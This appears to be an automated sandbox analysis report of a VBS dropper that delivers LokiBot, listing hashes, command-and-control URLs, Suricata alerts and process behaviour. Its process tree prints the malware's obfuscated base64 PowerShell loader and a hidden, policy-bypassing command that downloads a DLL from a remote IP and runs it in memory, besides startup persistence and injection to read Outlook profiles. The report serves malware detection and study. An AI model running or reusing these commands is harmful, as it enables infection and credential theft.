Analysis
-
max time kernel
137s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2022 08:52
Static task
static1
Behavioral task
behavioral1
Sample
ORDINE.vbs
Resource
win7-20220715-en
General
-
Target
ORDINE.vbs
-
Size
231KB
-
MD5
e020cd23ba91c3f6ad9c9ed3d6f391b5
-
SHA1
c924b29e61a4765cee969e841a76e304b646c168
-
SHA256
d985cfc667c76c46662c1de784d8d8844af661f9fe421ab9f0a4f8d704002738
-
SHA512
6f01979834b8de6979bb485edaff44079ca58923b2e333e6e089ef76f73b13e6b5c51d2220163c0a216bc1f5576be4c0fc30867743e7f1ef70054868b083ff86
Malware Config
Extracted
http://20.7.14.99/dll/14-07-2022.mp4
Extracted
lokibot
http://vlascx.xyz/luck/cx/kai.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
-
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
-
suricata: ET MALWARE LokiBot Checkin
suricata: ET MALWARE LokiBot Checkin
-
suricata: ET MALWARE LokiBot Fake 404 Response
suricata: ET MALWARE LokiBot Fake 404 Response
-
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
-
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M2
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M2
-
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
-
suricata: ET MALWARE Powershell commands sent B64 3
suricata: ET MALWARE Powershell commands sent B64 3
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 1 2180 powershell.exe 2 2180 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook cvtres.exe Key opened \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cvtres.exe Key opened \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cvtres.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2180 set thread context of 3196 2180 powershell.exe cvtres.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1056 powershell.exe 1056 powershell.exe 2180 powershell.exe 2180 powershell.exe 536 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.execvtres.exedescription pid process Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 3196 cvtres.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 804 wrote to memory of 1056 804 WScript.exe powershell.exe PID 804 wrote to memory of 1056 804 WScript.exe powershell.exe PID 1056 wrote to memory of 2180 1056 powershell.exe powershell.exe PID 1056 wrote to memory of 2180 1056 powershell.exe powershell.exe PID 2180 wrote to memory of 536 2180 powershell.exe powershell.exe PID 2180 wrote to memory of 536 2180 powershell.exe powershell.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe PID 2180 wrote to memory of 3196 2180 powershell.exe cvtres.exe -
outlook_office_path 1 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cvtres.exe -
outlook_win_path 1 IoCs
Processes:
cvtres.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDINE.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DI⁂M⁂⁂u⁂Dc⁂Lg⁂x⁂DQ⁂Lg⁂5⁂Dk⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂N⁂⁂t⁂D⁂⁂Nw⁂t⁂DI⁂M⁂⁂y⁂DI⁂LgBt⁂H⁂⁂N⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂HY⁂5wBJ⁂Fc⁂TwBl⁂EI⁂U⁂BM⁂Eo⁂VQDH⁂Gg⁂dwB4⁂C4⁂Z⁂BV⁂HU⁂c⁂Bq⁂FU⁂TQBn⁂GM⁂ZQBR⁂FU⁂xwBQ⁂G4⁂Jw⁂p⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂Ew⁂T⁂Bw⁂Fc⁂VwBx⁂E8⁂a⁂BI⁂Fg⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB3⁂G8⁂bgBr⁂C8⁂Ng⁂y⁂DI⁂Lg⁂2⁂DQ⁂Mg⁂u⁂DI⁂OQ⁂x⁂C4⁂Mg⁂x⁂DI⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxD = [System.Text.encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/14-07-2022.mp4'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('vçIWOeBPLJUÇhwx.dUupjUMgceQUÇPn').GetMethod('LLpWWqOhHX').Invoke($null, [object[]] ('txt.wonk/622.642.291.212//:ptth'))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53de5056547a2b5039ab8b93b4a224b2e
SHA147067a14fe0854189f90d6b9609bd51666ca0dbb
SHA25622f7d2a696927163d7fa467aa3289060a17e521b4184bfd13e808ef4195ed59a
SHA5121527f92d0820a23696fa05d67ec19bb7be2aac3f0a745dbf1d4d7ae4c7b228d2f477ed95b79141eb43013f8ce67dc8a5c23a72bd08f0e510a6ff99e7fff98520
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
memory/536-137-0x0000000000000000-mapping.dmp
-
memory/536-138-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/536-139-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/1056-133-0x000001C2E0830000-0x000001C2E0852000-memory.dmpFilesize
136KB
-
memory/1056-146-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/1056-135-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/1056-132-0x0000000000000000-mapping.dmp
-
memory/2180-144-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/2180-136-0x00007FFE97C40000-0x00007FFE98701000-memory.dmpFilesize
10.8MB
-
memory/2180-134-0x0000000000000000-mapping.dmp
-
memory/3196-141-0x00000000004139DE-mapping.dmp
-
memory/3196-140-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3196-148-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3196-149-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/3196-150-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB